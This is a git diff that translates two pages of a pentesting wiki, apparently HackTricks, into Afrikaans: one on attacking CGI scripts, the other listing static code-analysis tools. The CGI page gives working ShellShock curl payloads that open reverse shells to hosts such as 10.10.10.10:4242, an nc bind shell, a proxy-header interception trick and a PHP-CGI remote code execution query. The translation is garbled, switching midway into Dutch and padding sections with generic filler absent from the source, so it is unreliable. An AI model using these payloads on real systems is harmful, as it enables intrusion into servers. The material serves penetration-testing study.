-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 
-# Information
+# Inligting
 
-The **CGI scripts are perl scripts**, so, if you have compromised a server that can execute _**.cgi**_ scripts you can **upload a perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **change the extension** from **.pl** to **.cgi**, give **execute permissions** \(`chmod +x`\) and **access** the reverse shell **from the web browser** to execute it.  
-In order to test for **CGI vulns** it's recommended to use `nikto -C all` \(and all the plugins\)
+Die **CGI-skripte is perl-skripte**, so as jy 'n bediener gekompromitteer het wat _**.cgi**_ skripte kan uitvoer, kan jy 'n perl-omgekeerde dop **oplaai** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), die **uitbreiding verander** van **.pl** na **.cgi**, **uitvoerregte gee** \(`chmod +x`\) en die omgekeerde dop **vanaf die webblaaier toegang** om dit uit te voer.
+Om te toets vir **CGI-gebreke**, word dit aanbeveel om `nikto -C all` \(en al die invoegtoepassings\) te gebruik.
 
 # **ShellShock**
 
-**ShellShock** is a **vulnerability** that affects the widely used **Bash** command-line shell in Unix-based operating systems. It targets the ability of Bash to run commands passed by applications. The vulnerability lies in the manipulation of **environment variables**, which are dynamic named values that impact how processes run on a computer. Attackers can exploit this by attaching **malicious code** to environment variables, which is executed upon receiving the variable. This allows attackers to potentially compromise the system.
+**ShellShock** is 'n **kwesbaarheid** wat die wyd gebruikte **Bash** opdraglyn-skulp in Unix-gebaseerde bedryfstelsels affekteer. Dit teiken die vermoë van Bash om opdragte uit te voer wat deur aansoeke oorgedra word. Die kwesbaarheid lê in die manipulasie van **omgewingsveranderlikes**, wat dinamiese benoemde waardes is wat impak het op hoe prosesse op 'n rekenaar uitgevoer word. Aanvallers kan dit uitbuit deur **skadelike kode** aan omgewingsveranderlikes te heg, wat uitgevoer word wanneer die veranderlike ontvang word. Dit stel aanvallers in staat om moontlik die stelsel te kompromitteer.
 
-Exploiting this vulnerability the **page could throw an error**.
+Deur hierdie kwesbaarheid te misbruik, kan die **bladsy 'n fout gooi**.
 
-You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**.
+Jy kan hierdie kwesbaarheid **vind** deur op te let dat dit 'n **ou Apache-weergawe** en **cgi\_mod** \(met cgi-lys\) gebruik of deur **nikto** te gebruik.
 
-## **Test**
+## **Toets**
 
-Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
+Die meeste toetse is gebaseer op die uitvoer van 'n string en verwag dat daardie string in die web-terugvoer teruggegee word. As jy dink 'n bladsy mag kwesbaar wees, soek na al die cgi-bladsye en toets hulle.
 
 **Nmap**
-
 ```bash
 nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
 ```
+## **Curl \(weerspieëlde, blinde en out-of-band\)**
 
-## **Curl \(reflected, blind and out-of-band\)**
+Curl is 'n nuttige hulpmiddel wat gebruik kan word vir die toetsing van CGI-skripsies. Dit kan gebruik word om HTTP-aanvrae na 'n webbediener te stuur en die respons te ontleed. Hier is 'n paar maniere waarop Curl gebruik kan word vir die toetsing van CGI-skripsies: weerspieëlde, blinde en out-of-band aanvalle.
 
+### Weerspieëlde aanvalle
+
+By 'n weerspieëlde aanval word die aanvallersinvoer direk in die HTTP-aanvraag ingesluit. Die webbediener sal die invoer dan verwerk en die uitset sal in die HTTP-respons teruggegee word. Dit kan gebruik word om te kyk of daar enige kwesbaarhede in die CGI-skripsie is wat die aanvaller kan uitbuit.
+
+### Blinde aanvalle
+
+By 'n blinde aanval word die aanvallersinvoer nie direk in die HTTP-respons ingesluit nie. In plaas daarvan sal die aanvaller 'n manier moet vind om die uitset van die aanvraag op 'n ander manier te ondersoek. Dit kan gedoen word deur te kyk na veranderinge in die gedrag van die webbediener of deur die aanvraag na 'n ander kanaal te stuur, soos 'n e-pos of 'n loglêer.
+
+### Out-of-band aanvalle
+
+By 'n out-of-band aanval word die aanvallersinvoer gebruik om 'n ander tipe kommunikasie te inisieer, soos DNS- of HTTP-aanvrae na 'n eksterne bediener. Die aanvaller kan dan die respons van hierdie aanvrae gebruik om inligting te verkry of verdere aanvalle uit te voer.
+
+Curl is 'n kragtige hulpmiddel wat verskeie aanvalstegnieke ondersteun. Dit kan gebruik word om CGI-skripsies te toets vir kwesbaarhede en om die veiligheid van 'n webtoepassing te verbeter.
 ```bash
 # Reflected
 curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
@@ -48,15 +59,45 @@ curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bi
 # Out-Of-Band Use Cookie as alternative to User-Agent
 curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
 ```
-
 [**Shellsocker**](https://github.com/liamim/shellshocker)
-
 ```bash
 python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
 ```
+## Uitbuiting
 
-## Exploit
+Om een CGI-kwetsbaarheid uit te buiten, moet je eerst de kwetsbaarheid identificeren en begrijpen hoe deze kan worden misbruikt. Hier zijn enkele veelvoorkomende methoden om CGI-kwetsbaarheden uit te buiten:
 
+### Command Injection
+
+Bij command injection maak je gebruik van het feit dat de invoer van de gebruiker direct wordt doorgegeven aan het besturingssysteem. Je kunt kwaadaardige commando's invoeren om opdrachten uit te voeren op de server. Dit kan leiden tot het uitvoeren van willekeurige code, het verkrijgen van gevoelige informatie of het verkrijgen van toegang tot het systeem.
+
+### Path Traversal
+
+Bij path traversal maak je gebruik van het feit dat de CGI-toepassing bestanden op de server kan lezen. Je kunt speciale tekens gebruiken om de bestandsnaam te manipuleren en toegang te krijgen tot bestanden buiten de beoogde directory. Dit kan leiden tot het lekken van gevoelige informatie of het uitvoeren van ongeautoriseerde acties.
+
+### File Inclusion
+
+Bij file inclusion maak je gebruik van het feit dat de CGI-toepassing externe bestanden kan opnemen. Je kunt speciale tekens gebruiken om een externe URL op te geven en kwaadaardige code uit te voeren vanaf een externe server. Dit kan leiden tot het uitvoeren van willekeurige code, het verkrijgen van gevoelige informatie of het verkrijgen van toegang tot het systeem.
+
+### Denial of Service (DoS)
+
+Bij een Denial of Service-aanval maak je gebruik van het feit dat de CGI-toepassing kwetsbaar is voor overbelasting. Je kunt een groot aantal verzoeken naar de server sturen om de server te overbelasten en onbeschikbaar te maken voor legitieme gebruikers.
+
+### Remote Code Execution (RCE)
+
+Bij Remote Code Execution maak je gebruik van het feit dat de CGI-toepassing externe code kan uitvoeren. Je kunt kwaadaardige code invoeren om opdrachten uit te voeren op de server. Dit kan leiden tot het uitvoeren van willekeurige code, het verkrijgen van gevoelige informatie of het verkrijgen van toegang tot het systeem.
+
+### SQL Injection
+
+Bij SQL Injection maak je gebruik van het feit dat de CGI-toepassing onvoldoende sanitizing uitvoert op SQL-query's. Je kunt kwaadaardige SQL-instructies invoeren om de database te manipuleren, gevoelige informatie te verkrijgen of toegang te krijgen tot het systeem.
+
+### Cross-Site Scripting (XSS)
+
+Bij Cross-Site Scripting maak je gebruik van het feit dat de CGI-toepassing onvoldoende sanitizing uitvoert op gebruikersinvoer. Je kunt kwaadaardige scripts invoeren die worden uitgevoerd in de browser van andere gebruikers. Dit kan leiden tot het stelen van sessiecookies, het uitvoeren van phishing-aanvallen of het verkrijgen van toegang tot gevoelige informatie.
+
+### Remote File Inclusion (RFI)
+
+Bij Remote File Inclusion maak je gebruik van het feit dat de CGI-toepassing externe bestanden kan opnemen. Je kunt speciale tekens gebruiken om een externe URL op te geven en kwaadaardige code uit te voeren vanaf een externe server. Dit kan leiden tot het uitvoeren van willekeurige code, het verkrijgen van gevoelige informatie of het verkrijgen van toegang tot het systeem.
 ```bash
 #Bind Shell
 $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8
@@ -70,42 +111,37 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt
 > set rhosts 10.1.2.11
 > run
 ```
+# **Proxy (MitM na Web-bedienerversoeke)**
 
-# **Proxy \(MitM to Web server requests\)**
+CGI skep 'n omgewingsveranderlike vir elke kop in die HTTP-versoek. Byvoorbeeld: "host: web.com" word geskep as "HTTP_HOST" = "web.com"
 
-CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP\_HOST"="web.com"
+Aangesien die HTTP_PROXY-veranderlike deur die web-bediener gebruik kan word. Probeer om 'n **kop** te stuur wat "**Proxy: <IP_aanvaller>:<POORT>**" bevat en as die bediener enige versoek gedurende die sessie uitvoer. Jy sal in staat wees om elke versoek wat deur die bediener gemaak word, vas te vang.
 
-As the HTTP\_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP\_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server.
+# Oue PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311)
 
-# Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
-
-Basically if cgi is active and php is "old" \(<5.3.12 / < 5.4.2\) you can execute code.  
-In order t exploit this vulnerability you need to access some PHP file of the web server without sending parameters \(specially without sending the character "="\).  
-Then, in order to test this vulnerability, you could access for example `/index.php?-s` \(note the `-s`\) and **source code of the application will appear in the response**.
-
-Then, in order to obtain **RCE** you can send this special query: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` and the **PHP code** to be executed in the **body of the request.  
-Example:**
+Basies, as cgi aktief is en php "oud" is (<5.3.12 / < 5.4.2), kan jy kode uitvoer.
+Om van hierdie kwesbaarheid gebruik te maak, moet jy toegang verkry tot 'n PHP-lêer van die web-bediener sonder om parameters te stuur (veral sonder om die karakter "=" te stuur).
+Daarna, om hierdie kwesbaarheid te toets, kan jy byvoorbeeld `/index.php?-s` (let op die `-s`) toegang en die **bronkode van die toepassing sal in die respons verskyn**.
 
+Daarna kan jy, om **RCE** te verkry, hierdie spesiale navraag stuur: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` en die **PHP-kode** wat in die **liggaam van die versoek uitgevoer moet word.
+Voorbeeld:
 ```bash
 curl -i --data-binary "" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
 ```
-
-**More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
+**Meer inligting oor die kwesbaarheid en moontlike aanvalle:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Voorbeeld**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
 
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositorium.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/code-review-tools.md b/network-services-pentesting/pentesting-web/code-review-tools.md
index 2227119a2..86ff3f504 100644
--- a/network-services-pentesting/pentesting-web/code-review-tools.md
+++ b/network-services-pentesting/pentesting-web/code-review-tools.md
@@ -1,43 +1,43 @@
-# Source code Review / SAST Tools
+# Bronkode-oorsig / SAST-hulpmiddels
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
-## Guidance and & Lists of tools
+## Leiding en lys van hulpmiddels
 
 * [**https://owasp.org/www-community/Source\_Code\_Analysis\_Tools**](https://owasp.org/www-community/Source\_Code\_Analysis\_Tools)
 * [**https://github.com/analysis-tools-dev/static-analysis**](https://github.com/analysis-tools-dev/static-analysis)
 
-## Multi-Language Tools
+## Veeltalige hulpmiddels
 
 ### [Naxus - AI-Gents](https://www.naxusai.com/)
 
-There is a **free package to review PRs**.
+Daar is 'n **gratis pakket om PR's te oorsien**.
 
 ### [**Semgrep**](https://github.com/returntocorp/semgrep)
 
-It's an **Open Source tool**.
+Dit is 'n **Open Source-hulpmiddel**.
 
-#### Supported Languages
+#### Ondersteunde tale
 
-| Category     | Languages                                                                                             |
+| Kategorie     | Tale                                                                                                  |
 | ------------ | ----------------------------------------------------------------------------------------------------- |
 | GA           | C# · Go · Java · JavaScript · JSX · JSON · PHP · Python · Ruby · Scala · Terraform · TypeScript · TSX |
 | Beta         | Kotlin · Rust                                                                                         |
 | Experimental | Bash · C · C++ · Clojure · Dart · Dockerfile · Elixir · HTML · Julia · Jsonnet · Lisp ·               |
 
-#### Quick Start
+#### Vinnige Begin
 
 {% code overflow="wrap" %}
 ```bash
@@ -50,13 +50,13 @@ semgrep scan --config auto
 ```
 {% endcode %}
 
-You can also use the [**semgrep VSCode Extension**](https://marketplace.visualstudio.com/items?itemName=Semgrep.semgrep) to get the findings inside VSCode.
+Jy kan ook die [**semgrep VSCode-uitbreiding**](https://marketplace.visualstudio.com/items?itemName=Semgrep.semgrep) gebruik om die bevindinge binne VSCode te kry.
 
 ### [**SonarQube**](https://www.sonarsource.com/products/sonarqube/downloads/)
 
-There is an installable **free version**.
+Daar is 'n installeerbare **gratis weergawe**.
 
-#### Quick Start
+#### Vinnige Begin
 
 {% code overflow="wrap" %}
 ```bash
@@ -71,18 +71,18 @@ brew install sonar-scanner
 # Using the token and from the folder with the repo, scan it
 cd path/to/repo
 sonar-scanner \
-  -Dsonar.projectKey= \
-  -Dsonar.sources=. \
-  -Dsonar.host.url=http://localhost:9000 \
-  -Dsonar.token=
+-Dsonar.projectKey= \
+-Dsonar.sources=. \
+-Dsonar.host.url=http://localhost:9000 \
+-Dsonar.token=
 ```
 {% endcode %}
 
 ### CodeQL
 
-There is an **installable free version** but according to the license you can **only use free codeQL version in Open Source projects**.
+Daar is 'n **installeerbare gratis weergawe**, maar volgens die lisensie kan jy die **gratis CodeQL-weergawe slegs in Open Source projekte gebruik**.
 
-#### Install
+#### Installeer
 
 {% code overflow="wrap" %}
 ```bash
@@ -108,13 +108,13 @@ codeql resolve qlpacks #Get paths to QL packs
 ```
 {% endcode %}
 
-#### Quick Start - Prepare the database
+#### Vinnige Begin - Maak die databasis gereed
 
 {% hint style="success" %}
-The first thing you need to do is to **prepare the database** (create the code tree) so later the queries are run over it.
+Die eerste ding wat jy moet doen is om die databasis gereed te maak (skep die kodeboom) sodat die navrae later daaroor uitgevoer kan word.
 {% endhint %}
 
-* You can allow codeql to automatically identify the language of the repo and create the database
+* Jy kan codeql toelaat om outomaties die taal van die repo te identifiseer en die databasis te skep
 
 {% code overflow="wrap" %}
 ```bash
@@ -127,12 +127,10 @@ codeql database create /path/repo/codeql_db --source-root /path/repo
 {% endcode %}
 
 {% hint style="danger" %}
-This **will usually trigger and error** saying that more than one language was specified (or automatically detected). **Check the next options** to fix this!
+Dit sal gewoonlik 'n fout veroorsaak wat sê dat meer as een taal gespesifiseer is (of outomaties opgespoor is). Kyk na die volgende opsies om dit reg te stel!
 {% endhint %}
 
-* You can do this **manually indicating** the **repo** and the **language** ([list of languages](https://docs.github.com/en/code-security/codeql-cli/getting-started-with-the-codeql-cli/preparing-your-code-for-codeql-analysis#running-codeql-database-create))
-
-{% code overflow="wrap" %}
+* Jy kan dit **handmatig aandui** deur die **repo** en die **taal** ([lys van tale](https://docs.github.com/en/code-security/codeql-cli/getting-started-with-the-codeql-cli/preparing-your-code-for-codeql-analysis#running-codeql-database-create))
 ```bash
 codeql database create  --language  --source-root 
 
@@ -142,7 +140,7 @@ codeql database create /path/repo/codeql_db --language javascript --source-root
 ```
 {% endcode %}
 
-* If your repo is using **more than 1 language**, you can also create **1 DB per language** indicating each language.
+* As jou repo **meer as 1 taal** gebruik, kan jy ook **1 DB per taal** skep wat elke taal aandui.
 
 {% code overflow="wrap" %}
 ```bash
@@ -156,7 +154,7 @@ codeql database create /path/repo/codeql_db --source-root /path/to/repo --db-clu
 ```
 {% endcode %}
 
-* You can also allow `codeql` to **identify all the languages** for you and create a DB per language. You need to give it a **GITHUB\_TOKEN**.
+* Jy kan ook `codeql` toelaat om **alle tale te identifiseer** en 'n databasis per taal te skep. Jy moet dit 'n **GITHUB\_TOKEN** gee. 
 
 {% code overflow="wrap" %}
 ```bash
@@ -170,13 +168,13 @@ codeql database create /tmp/codeql_db --db-cluster --source-root /path/repo
 ```
 {% endcode %}
 
-#### Quick Start - Analyze the code
+#### Vinnige Begin - Ontleed die kode
 
 {% hint style="success" %}
-Now it's finally time to analyze the code
+Nou is dit eindelik tyd om die kode te ontleed
 {% endhint %}
 
-Remember that if you used several languages, **a DB per language** would have been crated in the path you specified.
+Onthou dat as jy verskeie tale gebruik het, **'n DB per taal** in die pad wat jy gespesifiseer het, geskep sou wees.
 
 {% code overflow="wrap" %}
 ```bash
@@ -187,18 +185,18 @@ codeql database analyze /tmp/codeql_db/javascript --format=sarif-latest --output
 
 # Specify QL pack to use in the analysis
 codeql database analyze  \
-     --sarif-category= \
-    --sarif-add-baseline-file-info \ --format= \
-    --output=/out/file/path>
+ --sarif-category= \
+--sarif-add-baseline-file-info \ --format= \
+--output=/out/file/path>
 # Example
 codeql database analyze /tmp/codeql_db \
-    javascript-security-extended --sarif-category=javascript \
-    --sarif-add-baseline-file-info --format=sarif-latest \
-    --output=/tmp/sec-extended.sarif
+javascript-security-extended --sarif-category=javascript \
+--sarif-add-baseline-file-info --format=sarif-latest \
+--output=/tmp/sec-extended.sarif
 ```
 {% endcode %}
 
-#### Quick Start - Scripted
+#### Vinnige Begin - Geskript
 
 {% code overflow="wrap" %}
 ```bash
@@ -211,26 +209,25 @@ export FINAL_MSG="Results available in: "
 echo "Creating DB"
 codeql database create "$REPO_PATH/codeql_db" --db-cluster --source-root "$REPO_PATH"
 for db in `ls "$REPO_PATH/codeql_db"`; do
-    echo "Analyzing $db"
-    codeql database analyze "$REPO_PATH/codeql_db/$db" --format=sarif-latest --output="${OUTPUT_DIR_PATH}/$db).sarif"
-    FINAL_MSG="$FINAL_MSG ${OUTPUT_DIR_PATH}/$db.sarif ,"
-    echo ""
+echo "Analyzing $db"
+codeql database analyze "$REPO_PATH/codeql_db/$db" --format=sarif-latest --output="${OUTPUT_DIR_PATH}/$db).sarif"
+FINAL_MSG="$FINAL_MSG ${OUTPUT_DIR_PATH}/$db.sarif ,"
+echo ""
 done
 
 echo $FINAL_MSG
 ```
 {% endcode %}
 
-You can visualize the findings in [**https://microsoft.github.io/sarif-web-component/**](https://microsoft.github.io/sarif-web-component/) or using VSCode extension [**SARIF viewer**](https://marketplace.visualstudio.com/items?itemName=MS-SarifVSCode.sarif-viewer).
+Jy kan die bevindinge visualiseer in [**https://microsoft.github.io/sarif-web-component/**](https://microsoft.github.io/sarif-web-component/) of deur die gebruik van die VSCode-uitbreiding [**SARIF viewer**](https://marketplace.visualstudio.com/items?itemName=MS-SarifVSCode.sarif-viewer).
 
-You can also use the [**VSCode extension**](https://marketplace.visualstudio.com/items?itemName=GitHub.vscode-codeql) to get the findings inside VSCode. You will still need to create a database manually, but then you can select any files and click on `Right Click` -> `CodeQL: Run Queries in Selected Files`
+Jy kan ook die [**VSCode-uitbreiding**](https://marketplace.visualstudio.com/items?itemName=GitHub.vscode-codeql) gebruik om die bevindinge binne VSCode te kry. Jy sal steeds 'n databasis handmatig moet skep, maar dan kan jy enige lêers kies en klik op `Right Click` -> `CodeQL: Run Queries in Selected Files`
 
 ### [**Snyk**](https://snyk.io/product/snyk-code/)
 
-There is an **installable free version**.
-
-#### Quick Start
+Daar is 'n **installeerbare gratis weergawe**.
 
+#### Vinnige Begin
 ```bash
 # Install
 sudo npm install -g snyk
@@ -251,35 +248,31 @@ snyk container test [image]
 # Test for IaC vulns
 snyk iac test
 ```
-
-You can also use the [**snyk VSCode Extension**](https://marketplace.visualstudio.com/items?itemName=snyk-security.snyk-vulnerability-scanner) to get findings inside VSCode.
+Jy kan ook die [**snyk VSCode-uitbreiding**](https://marketplace.visualstudio.com/items?itemName=snyk-security.snyk-vulnerability-scanner) gebruik om bevindings binne VSCode te kry.
 
 ### [Insider](https://github.com/insidersec/insider)
 
-It's **Open Source**, but looks **unmaintained**.
+Dit is **Open Source**, maar lyk **ongeonderhou**.
 
-#### Supported Languages
+#### Ondersteunde Tale
 
-Java (Maven and Android), Kotlin (Android), Swift (iOS), .NET Full Framework, C#, and Javascript (Node.js).
-
-#### Quick Start
+Java (Maven en Android), Kotlin (Android), Swift (iOS), .NET Full Framework, C#, en Javascript (Node.js).
 
+#### Vinnige Begin
 ```bash
 # Check the correct release for your environment
 $ wget https://github.com/insidersec/insider/releases/download/2.1.0/insider_2.1.0_linux_x86_64.tar.gz
-$ tar -xf insider_2.1.0_linux_x86_64.tar.gz 
+$ tar -xf insider_2.1.0_linux_x86_64.tar.gz
 $ chmod +x insider
 $ ./insider --tech javascript  --target 
 ```
-
 ### [**DeepSource**](https://deepsource.com/pricing) 
 
-Free for **public repos**.
+Gratis vir **openbare repos**.
 
 ## NodeJS
 
 * **`yarn`**
-
 ```bash
 # Install
 brew install yarn
@@ -288,9 +281,7 @@ cd /path/to/repo
 yarn audit
 npm audit
 ```
-
 * **`pnpm`**
-
 ```bash
 # Install
 npm install -g pnpm
@@ -298,18 +289,14 @@ npm install -g pnpm
 cd /path/to/repo
 pnpm audit
 ```
-
-* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan)**:** Static security code scanner (SAST) for Node.js applications powered by [libsast](https://github.com/ajinabraham/libsast) and [semgrep](https://github.com/returntocorp/semgrep).
-
+* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan)**:** Statische sekuriteitskode-skander (SAST) vir Node.js-toepassings aangedryf deur [libsast](https://github.com/ajinabraham/libsast) en [semgrep](https://github.com/returntocorp/semgrep).
 ```bash
 # Install & run
 docker run -it -p 9090:9090 opensecurity/nodejsscan:latest
 # Got to localhost:9090
 # Upload a zip file with the code
 ```
-
-* [**RetireJS**](https://github.com/RetireJS/retire.js)**:** The goal of Retire.js is to help you detect the use of JS-library versions with known vulnerabilities.
-
+* [**RetireJS**](https://github.com/RetireJS/retire.js)**:** Die doel van Retire.js is om jou te help om die gebruik van JS-biblioteek weergawes met bekende kwesbaarhede op te spoor.
 ```bash
 # Install
 npm install -g retire
@@ -317,15 +304,13 @@ npm install -g retire
 cd /path/to/repo
 retire --colors
 ```
-
 ## Electron
 
-* [**electronegativity**](https://github.com/doyensec/electronegativity)**:** It's a tool to identify misconfigurations and security anti-patterns in Electron-based applications.
+* [**electronegativity**](https://github.com/doyensec/electronegativity)**:** Dit is 'n instrument om verkeerde konfigurasies en sekuriteitsantipatrone in Electron-gebaseerde toepassings te identifiseer.
 
 ## Python
 
-* [**Bandit**](https://github.com/PyCQA/bandit)**:** Bandit is a tool designed to find common security issues in Python code. To do this Bandit processes each file, builds an AST from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report.
-
+* [**Bandit**](https://github.com/PyCQA/bandit)**:** Bandit is 'n instrument wat ontwerp is om algemene sekuriteitsprobleme in Python-kode te vind. Om dit te doen, verwerk Bandit elke lêer, bou 'n AST daaruit en voer toepaslike invoegtoepassings teen die AST-knoppies uit. Nadat Bandit klaar is met die skandering van al die lêers, genereer dit 'n verslag.
 ```bash
 # Install
 pip3 install bandit
@@ -333,20 +318,16 @@ pip3 install bandit
 # Run
 bandit -r 
 ```
-
-* [**safety**](https://github.com/pyupio/safety): Safety checks Python dependencies for known security vulnerabilities and suggests the proper remediations for vulnerabilities detected. Safety can be run on developer machines, in CI/CD pipelines and on production systems.
-
+* [**veiligheid**](https://github.com/pyupio/safety): Safety kontroleer Python afhanklikhede vir bekende sekuriteitskwesbaarhede en stel die regte herstelmaatreëls voor vir opgespoorde kwesbaarhede. Safety kan op ontwikkelaarsmasjiene, in CI/CD-pyplyne en op produksiestelsels uitgevoer word.
 ```bash
 # Install
 pip install safety
 # Run
 safety check
 ```
-
-* [~~**Pyt**~~](https://github.com/python-security/pyt): Unmaintained.
+* [~~**Pyt**~~](https://github.com/python-security/pyt): Ononderhoud.
 
 ## .NET
-
 ```bash
 # dnSpy
 https://github.com/0xd4d/dnSpy
